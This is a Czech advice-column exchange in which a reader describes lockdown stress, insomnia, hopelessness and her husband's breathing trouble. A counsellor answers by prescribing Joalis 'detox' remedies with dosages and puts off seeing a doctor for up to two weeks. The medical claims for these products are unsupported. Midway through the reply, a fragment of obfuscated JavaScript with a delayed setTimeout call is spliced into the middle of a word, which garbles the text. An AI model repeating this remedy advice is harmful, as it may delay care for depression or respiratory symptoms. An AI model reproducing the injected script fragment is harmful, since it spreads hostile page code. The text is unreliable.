Poradna

Meduňčina detoxikační poradna s Vlaďkou Málovou: duben

Dobrý den,

obracím se na vás s dotazem, sama už si nevím rady a netuším, kam se obrátit o pomoc.
Doma je nás celkem pět. Všechny tři děti chodí na základní školu, tedy teď nechodí a jsou doma. My s manželem jsme také doma, máme oba home office.
Děti mají hromadu školních povinností, do toho práce, péče o domácnost, atd. Je to pro mě poměrně náročné. Navíc jsme spolu 24hodin pohromadě a nejsme na to zvyklí.
Jsme všichni zdraví i dál pracujeme, tak si vlastně nemám na co stěžovat…. Přesto mi tato situace přerůstá přes hlavu a mám pocit, že už nemůže. Po fyzické stránce jsme všichni v pořádku, bereme Imun a Gripin a cítíme se dobře. Po psychické stránce to začíná být horší. Oba s manželem ztrácíme trpělivost, častěji křičíme na děti. Hlavně já jsem podrážděná a vyjíždím na všechny. Při tom jsem si vědoma, že je to hlavně o ponorce a o tom jak na nás celá situace působí. Dcera je v citlivém věku, jde do puberty a nerada bych jí nějak neublížila.
Já již několik dní špatně usínám a taky se během noci budím, což jsem dříve neměla. Párkrát jsem měla pocit beznaděje, a pokud mě popadne večer, tak mám pak problém usnout.
Manžel říká, že usne, ale také se budí a občas se mu hůře dýchá, má takové pesimistické názory, a to nemíval. Podniká a cítí zodpovědnost za své zaměstnance.
Mám prosbu a dotaz. Co byste nám doporučila pro „přežití“ současného stavu, něco na psychiku? Máme pokračovat i v užívání Imunu a Gripinu?

Předem moc děkuji za odpověď, Klára S.

 

Dobrý den,

děkuji vám za otevřený dotaz. Věřte, že nyní není ojedinělý – je mnoho rodin, které prožívají podobnou situaci jako vy. Je to opravdu náročné pro všechny.
Musíme rozklíčovat, co se vlastně ve vaší rodině děje a co je tím, co vás dostává do psychické nepohody.

Začnu manželem, u něj je jasné, že má obavy a starosti o své zaměstnance, cítí za ně zodpovědnost, to je pochopitelné. Snížená psychická odolnost z jakéhokoli důvodu, má za následek také snížení imunity a to v současné pandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andemii není dobře. Manželovi bych doporučila užívat přípravky Joalis Imun a Gripin a přidat také Depren a Streson. Kombinace Depren a Streson, by měla pomoci lépe toto období překonat po psychické stránce. Streson je přípravek, který s oblibou nejen já, ale i kolegové využívají při zvýšeném stresu u svých klientů. Depren by měl pomoci s hlubšími potížemi. Zlepšení by mělo nastat během několika dní maximálně do 2 týdnů, pokud ne, je na zváženou návštěva lékaře.
Někdy jsou v životě situace, kdy přírodní přípravky nestačí a je třeba využít západní medicínu.
Nikdo nevíme, jak dlouho bude tento stav trvat, ani co bude následovat. To znamená, jak dlouho bude pro manžela trvat doba nejistot. Bylo by vhodné kúru doplnit také o přípravek Magne B6, který organismu také pomůže.

Co se týká vás. Jak se podívat na vaše obtíže a jak jim rozumět? Jedna věc je časová náročnost situace – tedy zodpovědně pracovat a odvádět očekávané výsledky. Nemůžete se plně soustředit na práci, nelze zcela vypnout, protože víte, že děti jsou doma a potřebují vás.
Druhá věc je, že možná cítíte bezmoc. Ne, každé podráždění a vztek je o skutečném vzteku, často je to o jiné emoci, která se za vztekem skrývá, například strach a bezmoc.
U vás doporučuji přípravek Joalis Emoce, jsou v něm „ukryté“ veškeré emoce. K tomu bych přidala ještě Streson a také zopakovat sadu Imun a Gripin – poslední dva zopakujte i u dětí.
Celkově byste se měla během několika dní cítit lépe. S mužem můžete oba Streson užívat 3 – 5 x denně po 8 kapkách.
Tyto dny nám dají i mnohé pozitivní a mnoho nás naučí.

Přeji vám klidné dny a brzké zlepšení. Vlaďka Málová

Vlaďka Málová působí v Praze v Centru C. I. C. (Křišťanova 20, Praha 3) a v Jablonci nad Nisou v Centru zdraví – Radost (Poštovní 8, Jablonec nad Nisou). Své dotazy jí můžete posílat na email: poradna@vladkamalova.cz, do předmětu uveďte Poradna Meduňka.
Více informací najdete na webu www.joalis.cz.